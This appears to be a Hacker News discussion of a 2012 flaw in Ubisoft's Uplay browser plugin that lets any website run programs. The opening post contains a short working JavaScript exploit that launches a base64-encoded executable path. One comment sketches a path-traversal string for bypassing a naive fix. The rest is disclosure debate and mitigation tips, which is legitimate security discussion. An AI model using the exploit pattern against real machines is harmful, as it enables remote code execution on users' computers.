WingNews logo WingNews GitHub [2]
top | item 4311264

Ubisoft "Uplay" DRM exposed as rootkit

317 points| rightclick | 13 years ago | reply

If you play one of the games below try clicking on this link (tested with Assassin's Creed on Win7 and FireFox).

http://pastehtml.com/view/c6gxl1a79.html

  var x = document.createElement('OBJECT');
  
  x.setAttribute("type", "application/x-uplaypc");
  document.body.appendChild(x);
  x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Ubisoft installs a backdoor that allows any website to take over your computer. The Sony BMG rootkit was also DRM and required product recall when it was discovered.

http://en.wikipedia.org/wiki/Ubisoft#Games

    Assassin's Creed II
    Assassin's Creed: Brotherhood
    Assassin's Creed: Project Legacy
    Assassin's Creed Revelations
    Assassin's Creed III
    Beowulf: The Game
    Brothers in Arms: Furious 4
    Call of Juarez: The Cartel
    Driver: San Francisco
    Heroes of Might and Magic VI
    Just Dance 3
    Prince of Persia: The Forgotten Sands
    Pure Football
    R.U.S.E.
    Shaun White Skateboarding
    Silent Hunter 5: Battle of the Atlantic
    The Settlers 7: Paths to a Kingdom
    Tom Clancy's H.A.W.X. 2
    Tom Clancy's Ghost Recon: Future Soldier
    Tom Clancy's Splinter Cell: Conviction
    Your Shape: Fitness Evolved

136 comments

order
[+] Foy|13 years ago|reply
Oh hell no. I can't believe this shit... and Tom Clancy's Ghost Recon: Future Soldier was such a good game too. T_T

Next time I want to play an Ubisoft game I'm just going to pirate it.

EDIT: I buy 99% of my video games through Steam, and when the games I get through Steam want to use their own launcher (play, windows live games, or EA's Origin, for example) I always get peeved.. to find out it allows arbitrary remote code execution is absolutely infuriating.

EDIT: Oh, btw, I'm using Opera 12.

EDIT: Protect yourself (in Opera, at least) by going to Settings -> Preferences(menu option) -> Advanced(Tab) -> Downloads(left menu bar) -> Search for "uplay" and delete the associated row.

[+] jiggy2011|13 years ago|reply
I hate the hoop jumping in modern games. I was playing Street Fighter 4 recently and it comes up with "oh, you want to save your single player game? You have to create a MicrosoftWindowsBingGamesPhone8ForXboxLive.Net account" .

Then of course you have to wait for the damn thing to sign in every time you want to play the game "Connection failed, do you want to retry?"

[+] cheald|13 years ago|reply
I'm just not buying any more Ubisoft games. Between the abortion of the user experience that is UPlay, their crappy always-online DRM, and then this, I'm just done giving them my money, I don't care how much I like their games.

There's no shortage of good games to play, and I'm just not going to give my money to companies that abuse their customers like Ubisoft does.

Hey Ubisoft, because I hope someone there is reading this thread: When your DRM is so bad that it makes people who would otherwise buy your games want to pirate them, you have utterly, totally, and completely failed. Pass that on to your boss please.

Edit: Protect yourself in Chrome by going to about:plugins and just turning it off.

[+] iy56|13 years ago|reply
Pirating the software does not do anything here. The security hole is not related to the DRM and pirated versions come with the same UPlay installs as legitimate copies.
[+] beedogs|13 years ago|reply
"Next time I want to play an Ubisoft game I'm just going to pirate it."

Another good reason to pirate Ubisoft's games is that none of them work when Uplay is down. Uplay is down a lot more often than never.

[+] pilif|13 years ago|reply
I wouldn't say that this is a rootkit (there's no kernel-based magic or even just privilege elevation going on), nor that this was done with bad intentions.

This is just inexperienced developers («it's "encrypted" using base64 - we're fine!!») that had a "great idea" (= launch games from an embedded IE control) that has, kinda, backfired.

The sad thing is that it would be trivial (I'm using the word "trivial" here are I have implemented something like this just last friday in 3 hours) to add a signature to that command line and only execute signed command lines - I mean, these Games require an internet connection anyways, so there's nothing stopping them from serving the launcher from somewhere in the web and have a private key there to do the signing.

[+] Zolomon|13 years ago|reply
Just for your information; rootkits can exist in any of the rings[1]. However, kernel-mode rootkits are most often harder to detect and get rid off. There are several definitions of a rootkit, a common definition is "software designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer."[2]

[1] http://en.wikipedia.org/wiki/Ring_(computer_security) [2] http://en.wikipedia.org/wiki/Rootkit

[+] kevingadd|13 years ago|reply
Why does Tavis Ormandy (http://seclists.org/fulldisclosure/2012/Jul/375) keep putting fully usable proof of concept exploits out for widely deployed software without giving a vendor time to prepare a patch, or in this case, even notifying them? Off the top of my head, I remember he did this for the windows help center exploit and the java web start exploit. I can't understand why you would do this. You could at least give the vendor a couple weeks, and then if you're super worried, release the details as soon as an exploit is found in the wild.

As-is, he just seems like a raging hacker who loves attention and doesn't care if thousands of unsuspecting users get their credit card details stolen by malware authors. I must be misunderstanding something, yeah?

[+] Paul_S|13 years ago|reply
Because the company wasn't acting in good faith? IMHO they put that there on purpose and they deserve to be exposed as evil bastards that they are.
[+] slackito|13 years ago|reply
Giving a browser plugin the ability to run any program on the user machine without any kind of validation or prompting is so stupid/evil that they deserve the worst PR backlash they can get.

Also, that's probably the quickest way to get them to release a fix.

[+] quadhome|13 years ago|reply
The full disclosure debate goes back a long time. I recommend doing some light Googling to understand some of the counterpoints.

http://en.wikipedia.org/wiki/Full_disclosure

As for your "raging hacker who ...," dig, consider the idea that malware authors already knew about the vulnerability and have been using it.

[+] kevingadd|13 years ago|reply
I asked a question. If you're going to downvote me for having a wrong opinion, you should at least respond and tell me me the answer to my question, like 'this is proper behavior for a security researcher because X'.
[+] killyourheros|13 years ago|reply
Very few comapnies will pay for this type of exploit, even fewer will offer a thanks. It's easier to get them fixed this way.
[+] fmavituna|13 years ago|reply
Google chrome users: You can go to "about:plugins" and disable this and all other things that might expose you to extra security risks such as "Microsoft Office" (even "Native Client") or any other plugins that exposed in there by 3rd party without any confirmation.
[+] vyrotek|13 years ago|reply
I think they just fixed this. It opened Uplay and it instantly downloaded a new update released today.

Version 2.0.4 - Monday July 30th 2012 - "Fix addressing browser plugin. Plugin now only able to open Uplay application"

[+] MichaelGG|13 years ago|reply
I would love to see how they patched it. Seems folks like these might implement a check like 'cmd.Contains("uplay.exe")' and let you do "C:\whatever\uplay.exe\..\..\bad.exe".
[+] simias|13 years ago|reply
I'm not sure if that's what the OP implied, but I'm not sure this was done on purpose. "Never attribute to malice that which is adequately explained by stupidity". Ubisoft is well know for their aggressive anti-pirating practices (cloud saves for instance), but that's just too idiotic.

Here's taviso's mail on seclists: http://seclists.org/fulldisclosure/2012/Jul/375

I hope ubisoft reacts quickly.

[+] aristidb|13 years ago|reply
If they can't do a crippling DRM properly, then maybe they have no business building one at all.
[+] Symmetry|13 years ago|reply
When trying to understand how this happened and what Ubisoft will do about it I agree that it probably was stupidity rather than malice. But when considering whether to do business with Ubisoft in the future remember Grey's Law: "Any sufficiently advanced stupidity is indistinguishable from evil".
[+] iy56|13 years ago|reply
This is a social integration feature and not part of their DRM.
[+] sargun|13 years ago|reply
This is concerning. Does anyone have any links to comments by Ubisoft? Any reason why they would need the ability to execute arbitrary code in a hidden manner? From what I understand, we call these things Trojans...
[+] cabirum|13 years ago|reply
UBI is not alone doing this.

Battlefield 3 also installs it's plugin ("ESN Launch Mozilla Plugin") in all browsers on a pc. It's capable of running EA's Origin service, so does it present the same threat?

[+] drucken|13 years ago|reply
Also, game publisher Nexon silently installs a browser plugin (Nexon Game Controller) on many (all?) of its games, none of which AFAIK need a browser:

Vindictus/Mabinogi Heroes

Dragon Nest

Maplestory

Atlantica Online

Combat Arms

[+] cgbystrom|13 years ago|reply
Without need to discuss security implementations - no.
[+] atrius|13 years ago|reply
I have several of these games (SWS, PoP, Heroes MM VI) installed as well as UPlay but do not have any file associations for the type listed. Nor is "x-uplaypc" anywhere in the registry for the Windows shell.

I also have titles that use online login from Ubi such as ANNO 2070 installed.

I think the list of affected titles is far smaller than listed.

How and when is this associate set? Has someone identified which application in the installer performs it? Is it a particular UPlay version?

I don't doubt they are setting this up to allow them to run games from a browser. EA does it with Origin, Valve does it with Steam, as well as numerous other applications.

I don't doubt its existence but I think people are starting a wildfire without enough facts. I can't even seem to research this because it's not on my machine.

[+] jeremysalwen|13 years ago|reply
Confirmed that this works on Win7/Firefox/Prince of Persia.
[+] mikeymeows|13 years ago|reply
Wow, well I already knew ubisoft were fisting me, but two hands? cmon.
[+] rmc|13 years ago|reply
Oh please, I know you're being light hearted, and repeating common cultual memes, but please keep the "recieving anal is submission" to your self. It's often used as an excuse to call gay men "not real men" or effeminit. People (of all genders & sexualities) who like fisting are not evil either.
[+] Foy|13 years ago|reply
More like two feet.

AFAIK Sony never installed backdoors, and I thought they were the worst of the DRM crowd.

[+] res0nat0r|13 years ago|reply
If this was something released by Valve would it be described as a 'rootkit', or more of a dumb mistake? The internet loves Steam and anything and everything by Valve and hates Ubisoft.
[+] slurgfest|13 years ago|reply
By all means, bring out the inept rootkit installed by Steam which creates any remotely comparable vulnerability in as many PCs.
[+] ajasmin|13 years ago|reply
So does this have some legitimate use on the web (such as product activation on the Ubisoft website) or is this an ActiveX component intended to be used locally that could have been marked as "safe for scripting" by mistake?

Edit: Other comments suggest there's a NPAPI plugin as well so it's definitely intended for use on the web.

Also in what sense is this a rootkit? Is this purposely hidden from the list of IE addons or something?

[+] bbrtyth|13 years ago|reply
Because of people like this (the straw was Growl installing itself for the third time), I've had to completely change the permissions on particularly vulnerable folders in OS X. Anyone creating software, if you are not already aware of this: installing anything that is not completely and clearly explained beforehand makes you a despicable wretch.
[+] caiusdurling|13 years ago|reply
FWIW growl doesn't install itself, applications that use it are _supposed_ to offer to install growl for you, but there's been a few that don't and just force it on you.

The growl devs really really hate those applications - http://growl.info/thirdpartyinstallations.php has more info.

[+] fmavituna|13 years ago|reply
Even though the original vulnerability was quite lame and violated the first rule of writing an ActiveX plugin (site-locking and making it only available over HTTPS otherwise it's still vulnerable to code execution via MITM).

It's impressive that they already updated Uplay to address this problem (not sure whether the fix is actually working or not though).

[+] Executor32|13 years ago|reply
Doesn't work for me in either IE or Chrome, and I have AssCreed II, AssBro, AssRev, and Forgotten Sands all installed. There is also no uPlay plugin to be found in either browser. I suspect this only applies to certain versions of uPlay; whether newer or older than the version I have installed, I have no idea.
[+] Aissen|13 years ago|reply
Any mitigation ? Is it possible to disable this browser plugin ?
[+] obtu|13 years ago|reply
Google and Mozilla will certainly add it to their plugin blacklists. Trojan capabilities remote-controlled through a browser, that's a very serious security risk to their users.
[+] e_p|13 years ago|reply
This is an simple, obvious and extremely dangerous error, that anyone with experience or appropriate education would have avoided.

There's an evident frivolous attitude towards technical quality control present here, and everyone should avoid installing games requiring uPlay for the time being.

[+] ferongr|13 years ago|reply
Hows does it work on Firefox? Does Ubisoft install an NPAPI plugin for browsers without ActiveX?